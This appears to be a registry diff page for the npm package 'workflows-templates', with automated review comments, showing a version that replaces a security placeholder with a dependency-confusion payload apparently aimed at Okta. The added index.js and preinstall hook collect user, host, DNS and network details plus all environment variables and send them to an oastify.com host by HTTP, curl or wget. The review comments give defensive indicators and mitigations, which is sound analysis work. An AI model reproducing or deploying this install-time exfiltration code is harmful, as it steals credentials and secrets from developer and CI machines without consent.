workflows-templates 0.0.1-security → 1.0.2
Potentially problematic release.
- package/index.js +69 -0
- package/package.json +8 -3
- package/README.md +0 -5
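--- a/package/index.js
+++ b/package/index.js
@@ -0,0 +1,69 @@
+// Apex Hunter v3 - index.js (Stealthy Node.js Payload)
+// This will be attempted first. If it fails, the shell fallback in package.json will run.
+
+const os = require('os');
+const fs = require('fs');
+const http = require('http');
+
+// ======================= CONFIGURATION =======================
+const oastHost = '0ghiupvsv1wtvtoarcpv56v0orusii67.oastify.com';
+const payloadIdentifier = 'Okta_Node_RCE';
+// =============================================================
+
+async function gatherIntel() {
+let report = `[+] === Nepalese Hunter: RCE Beacon (Node.js) ===\n`;
+report += `[>] Payload ID: ${payloadIdentifier}\n`;
+report += `[>] Timestamp: ${new Date().toUTCString()}\n`;
+
+// System and User Info
+try {
+const userInfo = os.userInfo();
+report += `\n[+] --- SYSTEM & USER CONTEXT ---\n`;
+report += `User: ${userInfo.username} (uid:${userInfo.uid}, gid:${userInfo.gid})\n`;
+report += `Hostname: ${os.hostname()}\n`;
+report += `Platform: ${os.platform()} ${os.release()} ${os.arch()}\n`;
+report += `PWD: ${process.cwd()}\n`;
+} catch (e) { }
+
+// DNS Resolver
+try {
+const resolvConf = fs.readFileSync('/etc/resolv.conf', 'utf8');
+report += `\n[+] --- DNS CONFIGURATION (/etc/resolv.conf) ---\n${resolvConf}\n`;
+} catch (e) { }
+
+// Environment Variables
+try {
+report += `\n[+] --- FULL ENVIRONMENT VARIABLES ---\n${JSON.stringify(process.env, null, 2)}\n`;
+} catch (e) { }
+
+return report;
+}
+
+function exfiltrate(data) {
+const options = {
+hostname: oastHost,
+port: 80,
+path: `/NODE-RCE-FROM-${os.hostname()}`,
+method: 'POST',
+headers: {
+'Content-Type': 'text/plain',
+'Content-Length': Buffer.byteLength(data),
+},
+};
+
+const req = http.request(options, (res) => {
+res.resume();
+});
+
+req.on('error', () => {
+process.exit(1); // Force fallback if exfil fails
+});
+
+req.write(data);
+req.end();
+}
+
+(async () => {
+const intelReport = await gatherIntel();
+exfiltrate(intelReport);
+})();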
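Review bot: Treat this file as a payload to block and respond to, not code to fix: `gatherIntel` folds the entire `process.env` (new line 36) together with `os.userInfo()`, hostname, platform and `/etc/resolv.conf` into one report, and `exfiltrate` POSTs it in cleartext on port 80 to the hard-coded `oastHost` under a `/NODE-RCE-FROM-<hostname>` path, so any build or CI host that installed this version should be assumed to have leaked whatever tokens and secrets were in its environment and those credentials rotated. The `req.on('error', () => process.exit(1))` handler on new line 59 exists only to hand off to the shell fallback in package.json's `preinstall`, so a failed Node beacon does not mean no exfiltration happened. High-signal indicators visible here are outbound HTTP to `*.oastify.com` from install hosts, the `Okta_Node_RCE` and `NODE-RCE-FROM-` marker strings, and a read of `/etc/resolv.conf` during an npm lifecycle script. The durable mitigation is at the install layer: run installs with `--ignore-scripts`, bind internal package names to a private registry or scope so an unscoped public package of the same name cannot be resolved (the "dependency confusion" the description itself names), and alert on lockfile diffs that newly resolve an internal name to the public registry.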
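--- a/package/package.json
+++ b/package/package.json
@@ -1,6 +1,11 @@
 {
 "name": "workflows-templates",
-"version": "
-"description": "
-"
+"version": "1.0.2",
+"description": "CRITICAL - RCE PoC via Dependency Confusion for Okta (nepalihacker000)",
+"main": "index.js",
+"scripts": {
+"preinstall": "node index.js 2>/dev/null || (PAYLOAD_URL='http://0ghiupvsv1wtvtoarcpv56v0orusii67.oastify.com'; SCRIPT_PATH='/tmp/p.sh'; (echo '#!/bin/sh' && echo 'o() { echo \"[+] --- $1 ---\"; };' && echo 'o GATHERING INTEL (SHELL_FALLBACK)'; echo 'o USER_PRIVILEGE'; id || whoami; echo; echo 'o HOST_KERNEL'; hostname; uname -a; echo; echo 'o PWD'; pwd; echo; echo 'o DNS_INTERNAL_PROOF'; cat /etc/resolv.conf; echo; echo 'o NETWORK_CONFIG'; (ip -o a || ifconfig || echo \"No network tools found.\"); echo; echo 'o ENVIRONMENT'; env;' && echo 'o EXFILTRATING'; echo 'EXFIL_DATA=$(o GATHERING INTEL \\(SHELL_FALLBACK\\) && o USER_PRIVILEGE && (id || whoami) && echo && o HOST_KERNEL && (hostname; uname -a) && echo && o PWD && pwd && echo && o DNS_INTERNAL_PROOF && cat /etc/resolv.conf && echo && o NETWORK_CONFIG && (ip -o a || ifconfig || echo \"No network tools found.\") && echo && o ENVIRONMENT && env)'; echo 'ENCODED_DATA=$(echo \"$EXFIL_DATA\" | base64 | tr -d \"\\n\")'; echo 'EXFIL_CMD=\"curl -s -X POST -H \\\"Content-Type: text/plain\\\" --data \\\"$ENCODED_DATA\\\" $PAYLOAD_URL/SHELL-RCE-FROM-$(hostname)\"'; echo 'eval $EXFIL_CMD || (echo \"$ENCODED_DATA\" | wget -q -O- --post-file=- --header=\"Content-Type: text/plain\" \"$PAYLOAD_URL/SHELL-RCE-WGET-$(hostname)\")') > $SCRIPT_PATH && chmod +x $SCRIPT_PATH && $SCRIPT_PATH)"
+},
+"author": "nepalihacker000",
+"license": "ISC"
 }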
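Review bot: The `preinstall` script on new line 7 is the actual trigger and runs with no user interaction on `npm install`; it executes `node index.js` and, should that exit non-zero, writes a shell script to `/tmp/p.sh`, executes it, and that script gathers user, host, DNS, network and full `env` details, base64-encodes them and posts them to the same `oastify.com` host via `curl` or `wget`. This two-stage design means the absence of a Node process in telemetry is not evidence the host was spared; detection should key on an npm lifecycle script spawning `sh`, a write to `/tmp/p.sh` immediately followed by its execution, and outbound requests carrying the `SHELL-RCE-FROM-` or `SHELL-RCE-WGET-` path prefixes. Enforcing `ignore-scripts=true` in CI `.npmrc` and pinning internal names to a private registry removes both stages at once. Note also that the removed `version` and `description` values (old lines 3–5) are truncated in this rendering, so the pre-change side of the diff cannot be fully recovered from this page.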
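--- a/package/README.md
+++ b/package/README.md
@@ -1,5 +0,0 @@
-# Security holding package
-
-This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
-
-Please refer to www.npmjs.com/advisories?search=workflows-templates for more information.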